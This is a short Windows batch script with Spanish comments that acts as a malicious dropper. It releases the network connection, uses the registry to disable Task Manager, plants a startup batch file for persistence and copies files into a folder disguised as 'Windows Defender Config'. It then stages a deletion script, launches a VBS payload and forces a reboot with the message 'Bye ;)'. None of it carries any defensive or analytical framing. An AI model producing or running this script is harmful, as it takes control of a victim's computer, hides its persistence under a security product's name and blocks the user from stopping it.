@echo off

:--------------------------------------
REM Chau Wi-Fi
ipconfig /release
:--------------------------------------
REM Sacar Task Manager
 
Reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
:--------------------------------------
copy ".\Archivos\lenstartup.bat" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\"
copy ".\Archivos" "%appdata%\Microsoft\Windows Defender Config\"
copy ".\Archivos\eliminar.bat" "%appdata%\Microsoft\"
start "%appdata%\Microsoft\Windows Defender Config\escribir.vbs"
shutdown /r /t 10 /c "Bye ;)"